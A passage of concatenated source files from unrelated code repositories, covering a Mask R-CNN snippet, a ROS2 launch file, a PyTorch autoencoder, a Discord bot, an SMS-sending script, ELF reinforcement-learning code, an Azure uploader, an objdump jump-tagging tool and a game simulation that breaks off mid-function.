model.load_weights(weights_path, by_name=True, exclude=[ "mrcnn_class_logits", "mrcnn_bbox_fc", "mrcnn_bbox", "mrcnn_mask"])
train(model)
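# A rough inference sketch after training (hypothetical image path; an
# inference config usually sets IMAGES_PER_GPU = 1):
#   model = modellib.MaskRCNN(mode="inference", config=config, model_dir=DEFAULT_LOGS_DIR)
#   model.load_weights(model.find_last(), by_name=True)
#   results = model.detect([skimage.io.imread("sample.png")], verbose=0)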
```
|
{
"source": "jediofgever/quadruped_ros2",
"score": 2
}
|
#### File: champ_bringup/launch/rviz.launch.py
```python
import os
from ament_index_python.packages import get_package_share_directory
from launch import LaunchDescription
from launch.actions import DeclareLaunchArgument
from launch.conditions import UnlessCondition
from launch.substitutions import LaunchConfiguration
from launch_ros.actions import Node
def generate_launch_description():
bringup_dir = get_package_share_directory('thorvald_bringup')
rviz_config_file = LaunchConfiguration('rviz_config')
declare_rviz_config_file_cmd = DeclareLaunchArgument(
'rviz_config',
default_value=os.path.join(bringup_dir, 'rviz',
'default_view.rviz'),
description='Full path to the RVIZ config file to use')
rviz_node = Node(
package='rviz2',
executable='rviz2',
name='rviz2',
# change it to screen if you wanna see RVIZ output in terminal
output={'both': 'log'},
arguments=['-d', rviz_config_file,
'--ros-args', '--log-level', 'ERROR']
)
return LaunchDescription([
declare_rviz_config_file_cmd,
rviz_node
])
```
|
{
"source": "jedi-padawan/autoencoders",
"score": 3
}
|
#### File: jedi-padawan/autoencoders/convolutional-autoencoder-small.py
```python
import matplotlib.pyplot as plt # plotting library
import numpy as np # this module is useful to work with numerical arrays
import pandas as pd
import random
import torch
import torchvision
from torchvision import datasets, transforms
from torch.utils.data import DataLoader,random_split
from torch import nn
import torch.nn.functional as F
import torch.optim as optim
#data_dir = 'dataset'
#train_dataset = torchvision.datasets.MNIST(data_dir, train=True, download=True)
#test_dataset = torchvision.datasets.MNIST(data_dir, train=False, download=True)
fsize = 228
batch_size = 256
train_transform = transforms.Compose([
    transforms.RandAugment(12, 5, 31),
    transforms.Resize(fsize),
    transforms.Grayscale(num_output_channels=1),  # assumption: SEM images are effectively single-channel; the encoder below expects 1 input channel
    transforms.ToTensor(),
])
test_transform = transforms.Compose([
    transforms.Resize(fsize),
    transforms.Grayscale(num_output_channels=1),
    transforms.ToTensor(),
])
data_path = '/pool/data/ISSM2020/issm2020-ai-challenge-normal-only/'
train_dataset = datasets.ImageFolder(data_path + "semTrain/" + "semTrain/", train_transform)
test_dataset = datasets.ImageFolder(data_path + "semTest/" + "semTest/", test_transform)
train_dataset.transform = train_transform
test_dataset.transform = test_transform
m = len(train_dataset)
n_val = int(m * 0.2)
train_data, valid_data = random_split(train_dataset, [m - n_val, n_val])  # the split sizes must sum exactly to m
batch_size=32
train_loader = torch.utils.data.DataLoader(train_data,
batch_size=batch_size,
shuffle=True, num_workers=5, pin_memory=True, drop_last=True)
valid_loader = torch.utils.data.DataLoader(valid_data,
batch_size=batch_size,
shuffle=True, num_workers=5, pin_memory=True, drop_last=True)
test_loader = torch.utils.data.DataLoader(test_dataset,
batch_size=1,
shuffle=True, num_workers=5, pin_memory=True, drop_last=True)
class Encoder(nn.Module):
def __init__(self, encoded_space_dim,fc2_input_dim):
super().__init__()
### Convolutional section
self.encoder_cnn = nn.Sequential(
nn.Conv2d(1, 8, 3, stride=2, padding=1),
nn.ReLU(True),
nn.Conv2d(8, 16, 3, stride=2, padding=1),
nn.BatchNorm2d(16),
nn.ReLU(True),
nn.Conv2d(16, 32, 3, stride=2, padding=0),
nn.ReLU(True)
)
### Flatten layer
self.flatten = nn.Flatten(start_dim=1)
        ### Linear section (for a 228x228 input, the conv stack above ends at 32 x 28 x 28)
        self.encoder_lin = nn.Sequential(
            nn.Linear(28 * 28 * 32, 128),
            nn.ReLU(True),
            nn.Linear(128, encoded_space_dim)
        )
def forward(self, x):
x = self.encoder_cnn(x)
x = self.flatten(x)
x = self.encoder_lin(x)
return x
class Decoder(nn.Module):
def __init__(self, encoded_space_dim,fc2_input_dim):
super().__init__()
        self.decoder_lin = nn.Sequential(
            nn.Linear(encoded_space_dim, 128),
            nn.ReLU(True),
            nn.Linear(128, 28 * 28 * 32),  # must mirror the encoder's flatten size for 228x228 inputs
            nn.ReLU(True)
        )
        self.unflatten = nn.Unflatten(dim=1,
                                      unflattened_size=(32, 28, 28))
self.decoder_conv = nn.Sequential(
nn.ConvTranspose2d(32, 16, 3,
stride=2, output_padding=0),
nn.BatchNorm2d(16),
nn.ReLU(True),
nn.ConvTranspose2d(16, 8, 3, stride=2,
padding=1, output_padding=1),
nn.BatchNorm2d(8),
nn.ReLU(True),
nn.ConvTranspose2d(8, 1, 3, stride=2,
padding=1, output_padding=1)
)
def forward(self, x):
x = self.decoder_lin(x)
x = self.unflatten(x)
x = self.decoder_conv(x)
x = torch.sigmoid(x)
return x
### Define the loss function
loss_fn = torch.nn.MSELoss()
### Define an optimizer (both for the encoder and the decoder!)
lr= 0.001
### Set the random seed for reproducible results
torch.manual_seed(0)
### Initialize the two networks
d = 4
#model = Autoencoder(encoded_space_dim=encoded_space_dim)
encoder = Encoder(encoded_space_dim=d,fc2_input_dim=128)
decoder = Decoder(encoded_space_dim=d,fc2_input_dim=128)
params_to_optimize = [
{'params': encoder.parameters()},
{'params': decoder.parameters()}
]
optim = torch.optim.Adam(params_to_optimize, lr=lr, weight_decay=1e-05)
# Check if the GPU is available
device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
print(f'Selected device: {device}')
# Move both the encoder and the decoder to the selected device
encoder.to(device)
decoder.to(device)
### Training function
def train_epoch(encoder, decoder, device, dataloader, loss_fn, optimizer):
# Set train mode for both the encoder and the decoder
encoder.train()
decoder.train()
train_loss = []
# Iterate the dataloader (we do not need the label values, this is unsupervised learning)
for image_batch, _ in dataloader: # with "_" we just ignore the labels (the second element of the dataloader tuple)
# Move tensor to the proper device
image_batch = image_batch.to(device)
# Encode data
encoded_data = encoder(image_batch)
# Decode data
decoded_data = decoder(encoded_data)
# Evaluate loss
loss = loss_fn(decoded_data, image_batch)
# Backward pass
optimizer.zero_grad()
loss.backward()
optimizer.step()
# Print batch loss
print('\t partial train loss (single batch): %f' % (loss.data))
train_loss.append(loss.detach().cpu().numpy())
return np.mean(train_loss)
### Testing function
def test_epoch(encoder, decoder, device, dataloader, loss_fn):
# Set evaluation mode for encoder and decoder
encoder.eval()
decoder.eval()
with torch.no_grad(): # No need to track the gradients
# Define the lists to store the outputs for each batch
conc_out = []
conc_label = []
for image_batch, _ in dataloader:
# Move tensor to the proper device
image_batch = image_batch.to(device)
# Encode data
encoded_data = encoder(image_batch)
# Decode data
decoded_data = decoder(encoded_data)
# Append the network output and the original image to the lists
conc_out.append(decoded_data.cpu())
conc_label.append(image_batch.cpu())
# Create a single tensor with all the values in the lists
conc_out = torch.cat(conc_out)
conc_label = torch.cat(conc_label)
# Evaluate global loss
val_loss = loss_fn(conc_out, conc_label)
return val_loss.data
def plot_ae_outputs(encoder,decoder,n=10):
plt.figure(figsize=(16,4.5))
    targets = np.array(test_dataset.targets)  # ImageFolder keeps targets as a plain list, not a tensor
    n = min(n, len(test_dataset.classes))     # cannot show more panels than there are classes
    t_idx = {i: np.where(targets == i)[0][0] for i in range(n)}
for i in range(n):
ax = plt.subplot(2,n,i+1)
img = test_dataset[t_idx[i]][0].unsqueeze(0).to(device)
encoder.eval()
decoder.eval()
with torch.no_grad():
rec_img = decoder(encoder(img))
plt.imshow(img.cpu().squeeze().numpy(), cmap='gist_gray')
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
if i == n//2:
ax.set_title('Original images')
ax = plt.subplot(2, n, i + 1 + n)
plt.imshow(rec_img.cpu().squeeze().numpy(), cmap='gist_gray')
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
if i == n//2:
ax.set_title('Reconstructed images')
plt.show()
num_epochs = 30
diz_loss = {'train_loss':[],'val_loss':[]}
for epoch in range(num_epochs):
train_loss = train_epoch(encoder,decoder,device,train_loader,loss_fn,optim)
    val_loss = test_epoch(encoder,decoder,device,valid_loader,loss_fn)  # validate on the held-out split rather than the test set
print('\n EPOCH {}/{} \t train loss {} \t val loss {}'.format(epoch + 1, num_epochs,train_loss,val_loss))
diz_loss['train_loss'].append(train_loss)
diz_loss['val_loss'].append(val_loss)
plot_ae_outputs(encoder,decoder,n=10)
# Plot losses
plt.figure(figsize=(10,8))
plt.semilogy(diz_loss['train_loss'], label='Train')
plt.semilogy(diz_loss['val_loss'], label='Valid')
plt.xlabel('Epoch')
plt.ylabel('Average Loss')
#plt.grid()
plt.legend()
#plt.title('loss')
plt.show()
```
|
{
"source": "jedipunkz/discord-bot-division2",
"score": 3
}
|
#### File: jedipunkz/discord-bot-division2/discord-bot-division2-message.py
```python
import discord
import os
class Isac(discord.Client):
async def on_ready(self):
print('Logged on as', self.user)
async def on_message(self, message):
if message.author == self.user:
return
if message.content.startswith('メンテ'):
await message.channel.send(
'こちらを見てくだしあ..!!!' +
'https://twitter.com/thedivisiongame'
)
if message.content.startswith('統計'):
await message.channel.send(
'こちらを見てくだしあ ..!!!\n' +
'ユーザ名 : nakama \n' +
'パスワード : <PASSWORD> \n' +
'http://172.16.17.32:23001/d/uWfWtAmZk/division2?orgId=1&from=now%2Fd&to=now%2Fd'
)
if message.content == "眠たい" \
or message.content == "眠い" \
or message.content == "ねむい":
await message.channel.send(
f"{message.author.mention}さん、寝ましょう"
)
def main():
token = os.getenv('token')
client = Isac()
client.run(token)
if __name__ == "__main__":
main()
```
|
{
"source": "JediRhymeTrix/AssignmentSubmission",
"score": 3
}
|
#### File: AssignmentSubmission/trishul/nsm2.py
```python
import urllib.request
#import urllib2
import http.cookiejar
from getpass import getpass
import sys
def smscall(un,pwd,msg,rcnum):
#username = input("Enter Username: ")
#passwd = getpass()
#message = input("Enter Message: ")
#number = input("Enter Mobile number:")
username=un
passwd=<PASSWORD>
message=msg
number=rcnum
message = "+".join(message.split(' '))
#Logging into the SMS Site
url = 'http://site24.way2sms.com/Login1.action?'
data = 'username='+username+'&password='+passwd+'&Submit=Sign+in'
#For Cookies:
cj = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
# Adding Header detail:
opener.addheaders = [('User-Agent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36')]
try:
usock = opener.open(url, data.encode())
except IOError:
print ("Error while logging in.")
sys.exit(1)
jession_id = str(cj).split('~')[1].split(' ')[0]
send_sms_url = 'http://site24.way2sms.com/smstoss.action?'
send_sms_data = 'ssaction=ss&Token='+jession_id+'&mobile='+number+'&message='+message+'&msgLen=136'
opener.addheaders = [('Referer', 'http://site25.way2sms.com/sendSMS?Token='+jession_id)]
try:
sms_sent_page = opener.open(send_sms_url,send_sms_data.encode())
except IOError:
print ("Error while sending message")
sys.exit(1)
print ("SMS has been sent.")
```
|
{
"source": "jedirv/ELF-OSU",
"score": 2
}
|
#### File: ELF-OSU/atari/model.py
```python
from rlpytorch import Model, ActorCritic
import torch
import torch.nn as nn
class Model_ActorCritic(Model):
def __init__(self, args):
super(Model_ActorCritic, self).__init__(args)
params = args.params
self.linear_dim = 1920
relu_func = lambda : nn.LeakyReLU(0.1)
# relu_func = nn.ReLU
self.trunk = nn.Sequential(
nn.Conv2d(12, 32, 5, padding = 2),
relu_func(),
nn.MaxPool2d(2, 2),
nn.Conv2d(32, 32, 5, padding = 2),
relu_func(),
nn.MaxPool2d(2, 2),
nn.Conv2d(32, 64, 3, padding = 1),
relu_func(),
nn.MaxPool2d(2, 2),
nn.Conv2d(64, 64, 3, padding = 1),
relu_func(),
nn.MaxPool2d(2, 2),
)
self.conv2fc = nn.Sequential(
nn.Linear(self.linear_dim, 512),
nn.PReLU()
)
self.policy_branch = nn.Linear(512, params["num_action"])
self.value_branch = nn.Linear(512, 1)
self.softmax = nn.Softmax()
def forward(self, x):
s = self._var(x["s"])
# print("input size = " + str(s.size()))
rep = self.trunk(s)
# print("trunk size = " + str(rep.size()))
rep = self.conv2fc(rep.view(-1, self.linear_dim))
policy = self.softmax(self.policy_branch(rep))
value = self.value_branch(rep)
return rep, dict(pi=policy, V=value)
# Format: key, [model, method]
Models = {
"actor_critic" : [Model_ActorCritic, ActorCritic]
}
```
#### File: ELF-OSU/elf_python/simulator.py
```python
from .zmq_adapter import InitSender, WaitAll, SendAll
import abc
import torch.multiprocessing as _mp
mp = _mp.get_context('spawn')
class Simulator(mp.Process):
'''
Wrapper for simulator.
Functions to override:
on_init: Initialization after the process has started.
restart: restart the environment.
terminal: property that tell whether the game has reached terminal
get_key: from the key, get the content. e.g. ``get_key("s")`` will give the encoded state of the game.
set_key: set the key from replies. e.g., ``set_key("a", 2)`` set the action to be 2 (and the underlying game can continue).
'''
def __init__(self, id, desc):
'''
Example:
        desc = dict(
            actor = dict(
                input = dict(s="", last_terminal=""),
                reply = dict(a=""),
                connector = "name1"
            ),
            train = dict(
                input = dict(s="", r="", a=""),
                reply = None,
                connector = "name2"
            )
        )
'''
super(Simulator, self).__init__()
self.id = id
self.agent_name = "game-" + self.id
self.desc = desc
def on_init(self):
pass
def restart(self):
pass
@abc.abstractproperty
def terminal(self):
pass
@abc.abstractmethod
def get_key(self, key):
pass
@abc.abstractmethod
def set_key(self, key, value):
pass
def run(self):
'''Return reward'''
self.chs = { }
for key, v in self.desc.items():
self.chs[key] = InitSender(v["connector"], self.id)
self.seq = 0
self.game_counter = 0
self.restart()
while True:
send_chs = {}
reply_chs = {}
reply_format = {}
data = { }
for name, v in self.desc.items():
# Collector and send data.
data_to_send = { k : self.get_key(k) for k, _ in v["input"].items() }
data_to_send.update({
"_agent_name" : self.agent_name,
"_game_counter" : self.game_counter,
"_seq" : self.seq
})
# A batch of size 1
data[name] = [ data_to_send ]
send_chs[name] = self.chs[name]
if v["reply"] is not None:
reply_chs[name] = self.chs[name]
reply_format[name] = v["reply"]
# Send all.
# print("[%s]: Before send ..." % agent_name)
SendAll(send_chs, data)
# Wait for receive if there is any. Note that if there are multiple
# desc, then we need to wait simultaneously.
# print("[%s]: Before wait reply ..." % agent_name)
replies = WaitAll(reply_chs)
# Set all the keys.
for name, reply in replies.items():
# Note that each reply is also a batch of size 1
for k, v in reply[0].items():
if k in reply_format[name]:
self.set_key(k, v)
if self.terminal:
self.seq = 0
self.game_counter += 1
self.restart()
else:
self.seq += 1
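# A minimal subclass sketch (hypothetical game) showing the override points:
# class CounterSim(Simulator):
#     def restart(self):
#         self.state, self.action = 0, 0
#     @property
#     def terminal(self):
#         return self.state >= 10
#     def get_key(self, key):
#         return {"s": self.state, "last_terminal": self.terminal}[key]
#     def set_key(self, key, value):
#         if key == "a":
#             self.action = value
#             self.state += 1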
```
#### File: ELF-OSU/rlpytorch/rlmethod_base.py
```python
import abc
from collections import defaultdict
from .utils import Stats
from .args_utils import ArgsProvider
class LearningMethod:
def __init__(self, mi=None, args=None):
'''Initialize a learning method. ``args`` encodes the hyperparameters that the learning method reads from the command line. For example
::
args = [
("T", 6),
("use_gradient_clip", dict(action="store_true"))
]
means that
* there is an argument ``T`` whose default value is ``6`` (int).
* there is a binary switch ``use_gradient_clip``.
When the second element of an entry in ``args`` is a dict, it will be used as the specification of ``ArgumentParser`` defined in :mod:`argparse`.
Once the arguments are loaded, they are accessible as attributes in ``self.args``. The class also call :func:`_init` so that the derived class
has a chance to initialize relevant variables.
Arguments:
mi (ModelInterface): The model to be updated using input batches.
args (list): The arguments used by the learning method.
If None (which is often the case), then :class:`LearningMethod`, as a base class, will automatically
call ``_args()`` of the derived class to get the arguments.
'''
if args is None:
self.args = ArgsProvider(
call_from = self,
define_args = self._args(),
on_get_args = self._init
)
else:
self.args = args
self._init(args)
# Accumulated errors.
self.stats = defaultdict(lambda : Stats())
self._cb = {}
if mi is not None:
self.model_interface = mi
def set_model_interface(self, mi):
'''Set the model to be updated. '''
self.model_interface = mi
def _args(self):
'''Return the arguments that the learning method will read from the command line'''
return []
@abc.abstractmethod
def _init(self, args):
'''The function is called when the learning method gets the arguments from the command line. Derived class overrides this function.
Arguments:
args(ArgsProvider): The arguments that have been read from the command line.
'''
pass
@abc.abstractmethod
def update(self, batch):
'''Compute the gradient of the model using ``batch``, and accumulate relevant statistics.
Note that all the arguments from command line are accessible as attributes in ``self.args``.
'''
pass
    def add_cb(self, name, cb):
        self._cb[name] = cb  # the callback dict is named _cb in __init__
def run(self, batch, update_params=True):
'''The method does the following
* Zero the gradient of the model.
* Compute the gradient with ``batch`` and accumulate statistics (call :func:`update`).
* If ``update_params == True``, update the parameters of the model.
'''
self.model_interface.zero_grad()
self.update(batch)
# If update_params is False, we only compute the gradient, but not update the parameters.
if update_params:
self.model_interface.update_weights()
def print_stats(self, global_counter=None, reset=True):
for k in sorted(self.stats.keys()):
v = self.stats[k]
print(v.summary(info=str(global_counter) + ":" + k))
if reset: v.reset()
# Some utility functions
def average_norm_clip(grad, clip_val):
''' The first dimension will be batchsize '''
batchsize = grad.size(0)
avg_l2_norm = 0.0
for i in range(batchsize):
avg_l2_norm += grad[i].data.norm()
avg_l2_norm /= batchsize
if avg_l2_norm > clip_val:
# print("l2_norm: %.5f clipped to %.5f" % (avg_l2_norm, clip_val))
grad *= clip_val / avg_l2_norm
def accumulate(acc, new):
ret = { k: new[k] if a is None else a + new[k] for k, a in acc.items() if k in new }
ret.update({ k : v for k, v in new.items() if not (k in acc) })
return ret
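# Example: accumulate({'loss': 1.0, 'n': None}, {'loss': 0.5, 'n': 3, 'acc': 0.9})
# returns {'loss': 1.5, 'n': 3, 'acc': 0.9} -- None entries are seeded, others summed.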
def check_terminals(has_terminal, batch):
# Block backpropagation if we go pass a terminal node.
for i, terminal in enumerate(batch["terminal"]):
if terminal: has_terminal[i] = True
def check_terminals_anyT(has_terminal, batch, T):
for t in range(T):
check_terminals(has_terminal, batch[t])
```
|
{
"source": "jedis00/foggycam",
"score": 3
}
|
#### File: foggycam/src/azurestorageprovider.py
```python
from azure.storage.blob import BlockBlobService, ContentSettings
class AzureStorageProvider(object):
"""Class that facilitates connection to Azure Storage."""
    def upload_video(self, account_name='', sas_token='', container='', blob='', path=''):
        """Upload video to the provided account."""
        if not (account_name and sas_token and container and blob):
            print('ERROR: No account credentials for Azure Storage specified.')
            return
        block_blob_service = BlockBlobService(account_name=account_name, sas_token=sas_token)
        containers = block_blob_service.list_containers()
        print("Available containers:")
        for container_entry in containers:
            print(container_entry.name)
        if not any(x for x in containers if x.name == container):
            block_blob_service.create_container(container)
        block_blob_service.create_blob_from_path(
            container,
            blob,
            path,
            content_settings=ContentSettings(content_type='video/mp4')
        )
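# Example call (hypothetical credentials and paths):
#   AzureStorageProvider().upload_video(account_name='myaccount', sas_token='?sv=...',
#                                       container='videos', blob='cam1.mp4', path='/tmp/cam1.mp4')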
```
|
{
"source": "jedisct1/jumpinjack",
"score": 3
}
|
#### File: jedisct1/jumpinjack/jumpinjack.py
```python
import getopt
import sys
import re
file, line_nb = None, 0
affected_files = {}
def tag_file(affected_file, affected_lines):
with open(affected_file) as f:
tagged_file = affected_file + ".tagged"
with open(tagged_file, "w") as h:
line_nb = 0
for line in f:
line_nb = line_nb + 1
if line_nb in affected_lines:
detail = affected_lines[line_nb]
if re.match(".*(for|while|do|if|else|assert|break|continue|switch|return|\}).*", line):
line = line.rstrip() + "\t/*** JJ: JUMP (" + detail + ") ***/\n"
else:
line = line.rstrip() + "\t/*** JJ: JUMP! (" + detail + ") ***/\n"
h.write(line)
print(tagged_file)
def tag(base_dir, dump_file):
file, line_nb = None, 0
for line in open(dump_file):
if re.match("^/.+[.].+:[0-9]+$", line):
file_, line_nb_ = line.strip().split(':')
if file_.startswith(base_dir):
file, line_nb = file_, int(line_nb_)
else:
file, line_nb = None, 0
continue
if not file:
continue
parts = line.strip().split("\t")
if len(parts) < 3:
continue
opcode = parts[2].split(' ')[0]
if not re.match("^(ja|jae|jb|jbe|jc|jcxz|je|jecxz|jg|jge|jl|jle|jna|jnae|" +
"jnb|jnbe|jnc|jne|jng|jnge|jnl|jnle|jno|jnp|jns|jnz|jo|" +
"jp|jpe|jpo|js|jz)$", opcode):
continue
if file not in affected_files:
affected_files[file] = {}
        affected_files[file][line_nb] = re.sub(r"\s+", " ", parts[2])
for affected_file in affected_files:
try:
tag_file(affected_file, affected_files[affected_file])
except IOError:
pass
def usage():
print("Usage: jumpinjack.py -b <base dir> -d <objdump file>")
sys.exit(2)
try:
opts, args = getopt.getopt(sys.argv[1:], "b:d:")
except getopt.GetoptError as err:
usage()
base_dir, dump_file = None, None
for o, a in opts:
if o == "-b":
base_dir = a
elif o == "-d":
dump_file = a
if (not base_dir) or (not dump_file):
usage()
tag(base_dir, dump_file)
```
|
{
"source": "jedislight/Shockball",
"score": 3
}
|
#### File: Shockball/Frameworks/CommonQueryAIFramework.py
```python
import math
import vector
from AI import AI
class CommonQueryAIFramework(AI):
def __init__(self):
pass
def GetClosestObject(self, origin, objects):
result = None
if objects:
distances = [(origin - obj.position).length for obj in objects]
result = objects[distances.index(min(distances))]
return result
def GetClosest(self, origin, positions):
result = None
if positions:
distances = [(origin - position).length for position in positions]
result = positions[distances.index(min(distances))]
return result
def GetClosestAttackableOpponent(self, player, ai_input):
target = self.GetClosestObject(player.position, [target for target in ai_input.player_infos if target.team != player.team and target.has_been_hit != True])
return target
def GetClosestInFlightThrownBall(self, player, ai_input):
avoid = self.GetClosestObject(player.position, [ball for ball in ai_input.in_flight_ball_infos if ball.is_throw])
return avoid
def GetClosestTeamateWithoutBall(self, player, ai_input):
return self.GetClosestObject(player.position, [player for player in ai_input.player_infos if player.team == ai_input.team and player.has_ball == False])
def GetPlayerNumbered(self, number, ai_input):
for player in ai_input.player_infos:
if player.number == number:
return player
return None
def GetHitTeammates(self, ai_input):
return [player for player in ai_input.player_infos if player.team == ai_input.team and player.has_been_hit]
def GetOpponents(self, ai_input):
return [player for player in ai_input.player_infos if player.team != ai_input.team]
def Distance(self, a, b):
if type(a) == vector.Vector:
return (a-b).length
return (a.position - b.position).length
def GetTeammates(self, ai_input):
return [player for player in ai_input.player_infos if player.team == ai_input.team]
def IsBallGoingToward(self, ball, position):
if ball:
ball_to_object = position - ball.position
ball_to_object.normalize()
ball_velocity_normalized = vector.Vector(ball.velocity.x, ball.velocity.y)
ball_velocity_normalized.normalize()
angel_of_approach = ball_to_object * ball_velocity_normalized
if angel_of_approach > .5:
return True
return False
```
#### File: Shockball/Frameworks/EasyStatsFramework.py
```python
from AI import AI
import Frameworks.PlayerStatsPrebuilts as PlayerStatsPrebuilts
class EasyStatsFramework(AI):
def __init__(self):
self.stats = [PlayerStatsPrebuilts.balanced, PlayerStatsPrebuilts.balanced, PlayerStatsPrebuilts.balanced]
def GetPlayerStats(self, player_number):
return self.stats[player_number - 1]
```
#### File: jedislight/Shockball/Simulation.py
```python
import vector
import random
import math
from AI import *
class LeTiredPlayer(object):
def __init__(self, position_x, position_y, team):
self.position = vector.Vector(position_x, position_y)
self.team = team
def Update(self):
pass
class Player(object):
def __init__(self, number):
self.number = number
self.position = vector.Vector()
self.run = 2
self.pick = 2
self.throw = 2
self.stamina = 2
self.team = 0
self.has_ball = False
self.update_per_tired_max = 200
        self.updates_till_tired = random.randint(int(self.update_per_tired_max * 0.8), self.update_per_tired_max)
self.has_been_hit = False
self.move_target = self.position
def SetStats(self, stats):
assert stats.AreValid()
self.run = stats.run
self.pick = stats.pick
self.throw = stats.throw
self.stamina = stats.stamina * 2 - 1
def Update(self, player_update_instructions):
self.updates_till_tired -= 1
self.move_target = self.position
#le tired
if self.updates_till_tired <= 0:
self.updates_till_tired = self.update_per_tired_max
self.TakeDamage()
#move
if self.has_been_hit and self.run != 0:
if self.team == 0:
direction = vector.Vector(0,-1)
else:
direction = vector.Vector(0,1)
velocity = direction * math.sqrt(self.run)
self.position = self.position + velocity
if (self.team == 0 and self.position.y <= 0) or (self.team == 1 and self.position.y >= Simulation.arena_size):
self.has_been_hit = False
elif player_update_instructions.is_moving == True and self.run != 0:
self.move_target= player_update_instructions.move_target
distance = (player_update_instructions.move_target - self.position).length
velocity = min(math.sqrt(self.run), distance)
impulse = self.move_target - self.position
impulse.normalize()
impulse = impulse * velocity
self.position = self.position + impulse
self.position.x = max(0.0, self.position.x)
self.position.x = min(Simulation.arena_size, self.position.x)
self.position.y = max(0.0, self.position.y)
self.position.y = min(Simulation.arena_size, self.position.y)
def TakeDamage(self):
if self.stamina > 0:
self.stamina -= 1
return
stat_choice = random.randint(0, 2)
if stat_choice == 0:
self.run -= 1
return
elif stat_choice == 1:
self.pick -= 1
return
elif stat_choice == 2:
self.throw -= 1
return
class GroundedBall(object):
def __init__(self, position_x, position_y):
self.position = vector.Vector(position_x, position_y)
    def Update(self):
        pass
class InFlightBall(object):
def __init__(self, target_x , target_y, position_x, position_y, thrower, is_throw, power=1.0):
power = min(power, 1.0)
power = max(power, 0.0)
self.position = vector.Vector(position_x, position_y)
self.previous_position = self.position
self.target = vector.Vector(target_x, target_y)
self.velocity = (self.target - self.position).normalize() * thrower.throw * 2 * power
self.updates_left = 5
self.thrower = thrower
self.is_throw = is_throw
def Update(self):
#move
self.previous_position = vector.Vector(self.position.x, self.position.y)
self.updates_left -= 1
self.position = self.position + self.velocity
if self.updates_left <= 0:
self.velocity = vector.Vector()
self.position.x = max(0, self.position.x)
self.position.x = min(Simulation.arena_size, self.position.x)
self.position.y = max(0, self.position.y)
self.position.y = min(Simulation.arena_size, self.position.y)
if self.position.x in (0.0, Simulation.arena_size) or self.position.y in (0.0, Simulation.arena_size):
#reflect
n = vector.Vector()
if self.position.x == 0.0:
n = n + vector.Vector(1,0)
if self.position.x == Simulation.arena_size:
n = n + vector.Vector(-1, 0)
if self.position.y == 0.0:
n = n + vector.Vector(0,-1)
if self.position.y == Simulation.arena_size:
n = n + vector.Vector(0, 1)
n.normalize()
self.velocity = self.velocity - n * ((self.velocity * n) * 2)
class Simulation(object):
arena_size = 100
def __init__(self, team_0_ai, team_1_ai):
self.update_count = 0
self.winning_team_won_on_update = -1
#ai store
self.ai = [team_0_ai, team_1_ai]
#set final state
self.winning_team = -1
#set teams
        self.players = [Player(1), Player(2), Player(3), Player(4), Player(5), Player(6)]  # two teams of three
self.players[0].team = 0
self.players[1].team = 0
self.players[2].team = 0
self.players[3].team = 1
self.players[4].team = 1
self.players[5].team = 1
#setup stats
self.players[0].SetStats(team_0_ai.GetPlayerStats(1))
self.players[1].SetStats(team_0_ai.GetPlayerStats(2))
self.players[2].SetStats(team_0_ai.GetPlayerStats(3))
self.players[3].SetStats(team_1_ai.GetPlayerStats(1))
self.players[4].SetStats(team_1_ai.GetPlayerStats(2))
self.players[5].SetStats(team_1_ai.GetPlayerStats(3))
#set positions
self.players[0].position = vector.Vector(.25*self.arena_size, 0)
self.players[1].position = vector.Vector(.50*self.arena_size, 0)
self.players[2].position = vector.Vector(.75*self.arena_size, 0)
self.players[3].position = vector.Vector(.25*self.arena_size, self.arena_size)
self.players[4].position = vector.Vector(.50*self.arena_size, self.arena_size)
self.players[5].position = vector.Vector(.75*self.arena_size, self.arena_size)
#set balls
self.grounded_balls = [
GroundedBall(.50*self.arena_size, .10*self.arena_size),
GroundedBall(.25*self.arena_size, .50*self.arena_size),
GroundedBall(.50*self.arena_size, .50*self.arena_size),
GroundedBall(.75*self.arena_size, .50*self.arena_size),
GroundedBall(.50*self.arena_size, .90*self.arena_size)
]
#setup inflight balls
self.in_flight_balls = []
#setup le tired players
self.le_tired_players = []
def Update(self):
self.update_count += 1
#update everything
for updateable in self.grounded_balls + self.in_flight_balls:
updateable.Update()
players_instructions = dict()
for player in self.players:
players_instructions[player] = PlayerUpdateInstructions(player.number)
#do AI here
for team in [0,1]:
ai_input = AIInput(self, team)
ai_output = self.ai[team].Update(ai_input)
for player_update_instruction in ai_output.player_update_instructions:
for player in self.players:
if player.number == player_update_instruction.number and player.team == team:
players_instructions[player] = player_update_instruction
for player in self.players:
player.Update(players_instructions[player])
#pick
for player in self.players:
if players_instructions[player].is_picking and player.has_been_hit == False:
if len(self.grounded_balls) > 0:
nearest_ball = None
nearest_distance = self.arena_size * 10
for grounded_ball in self.grounded_balls:
distance_to_player_for_current_grounded_ball = (player.position - grounded_ball.position).length
if distance_to_player_for_current_grounded_ball < nearest_distance:
nearest_distance = distance_to_player_for_current_grounded_ball
nearest_ball = grounded_ball
if nearest_distance <= 2.0:
#close enough to pick yay!
if random.randint(1,20) <= player.pick ** player.pick:
#success
player.has_ball = True
self.grounded_balls.remove(nearest_ball)
#pass/throw
for player in self.players:
if player.has_ball == False:
continue
instructions = players_instructions[player]
if instructions.is_throwing or instructions.is_passing:
target = instructions.throw_target
power = instructions.throw_power
if instructions.is_passing:
target = instructions.pass_target
power = instructions.pass_power
player.has_ball = False
ball = InFlightBall(target.x, target.y, player.position.x,
player.position.y, player, instructions.is_throwing, power)
self.in_flight_balls.append(ball)
#ball grounding
for ball in self.in_flight_balls[:]:
if ball.updates_left <= 0:
self.in_flight_balls.remove(ball)
self.grounded_balls.append(GroundedBall(ball.position.x, ball.position.y))
#collision!
for ball in self.in_flight_balls[:]:
nearest_player = None
nearest_distance = self.arena_size * 10 # really big
for player in self.players:
if ball.thrower != player:
distance = Simulation.DistanceToLineSegment(ball.position, ball.previous_position, player.position)
if distance < nearest_distance:
nearest_player = player
nearest_distance = distance
player = nearest_player
if player != None and nearest_distance <= 2:
#collision!
if player.has_been_hit or player.has_ball:
self.grounded_balls.append(GroundedBall(ball.position.x, ball.position.y))
elif ball.is_throw:
player.TakeDamage()
player.has_been_hit = True
